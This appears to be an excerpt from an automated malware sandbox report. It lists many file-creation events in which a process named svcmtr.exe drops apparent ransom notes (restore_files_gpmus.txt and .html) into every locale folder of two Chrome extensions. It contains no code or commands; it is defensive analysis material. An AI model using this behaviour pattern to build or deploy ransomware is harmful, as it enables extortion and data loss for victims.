Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ms\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ms\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sr\restore_files_gpmus.txtJump to behavior
